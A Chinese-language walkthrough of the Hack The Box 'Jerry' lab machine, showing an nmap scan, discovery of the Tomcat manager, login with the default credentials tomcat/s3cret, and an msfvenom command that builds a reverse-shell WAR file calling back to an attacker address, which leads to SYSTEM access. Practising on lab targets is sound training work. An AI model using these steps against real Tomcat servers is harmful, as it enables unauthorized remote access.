HTB的Jerry滲透測試是什么

本篇內容主要講解“HTB的Jerry滲透測試是什么”，感興趣的朋友不妨來(lái)看看。本文介紹的方法操作簡(jiǎn)單快捷，實(shí)用性強。下面就讓小編來(lái)帶大家學(xué)習“HTB的Jerry滲透測試是什么”吧!

基礎信息

簡(jiǎn)介：Hack The Box是一個(gè)在線(xiàn)滲透測試平臺?？梢詭椭闾嵘凉B透測試技能和黑盒測試技能，平臺環(huán)境都是模擬的真實(shí)環(huán)境，有助于自己更好的適應在真實(shí)環(huán)境的滲透
鏈接：https://www.hackthebox.eu/home/machines/profile/144
描述：

前言

本次演練使用kali系統按照滲透測試的過(guò)程進(jìn)行操作，通過(guò)nmap發(fā)現端口開(kāi)放了tomcat8080端口,使用密碼登錄tomcat，使用msfvenom 生成war文件上傳到tomcat中，通過(guò)反彈獲取shell。

一、信息收集

1、靶機ip

IP地址為：10.10.10.95

2、靶機端口與服務(wù)

nmap -sV -sS -T4 -O -A 10.10.10.95

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

3、網(wǎng)站信息收集

查看8080端口

通過(guò)dirsearch進(jìn)行目錄掃描獲取網(wǎng)站目錄

這里我列出了部分需要的目錄

/host-manager/html
/manager/html
/manager/

二、漏洞探測與利用

1、生成木馬文件

進(jìn)入/host-manager/html目錄發(fā)現需要賬號密碼

點(diǎn)擊取消后，再返回界面發(fā)現賬號與密碼

username="tomcat"
password="s3cret"
使用該密碼進(jìn)行登錄，返回403頁(yè)面無(wú)法正常進(jìn)行登錄

最后在/manager/目錄下成功登錄

發(fā)現可以上傳war格式文件
使用msfvenom生成shell文件

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f war > shell.war

2、使用msf獲取shell

首先設置好msf，使用msf監聽(tīng)4444端口獲取反彈的shell

在登陸頁(yè)面上傳war文件

上傳成功后點(diǎn)擊shell

成功獲取到shell

三、提權

使用這種方式所獲取的直接是authority權限可直接查看root.txt

進(jìn)入 \Users\Administrator\Desktop目錄發(fā)現沒(méi)有root.txt但是存在flags

進(jìn)入flags目錄使用type命令查看2 for the price of 1.txt文件
獲取到root.txt與user.txt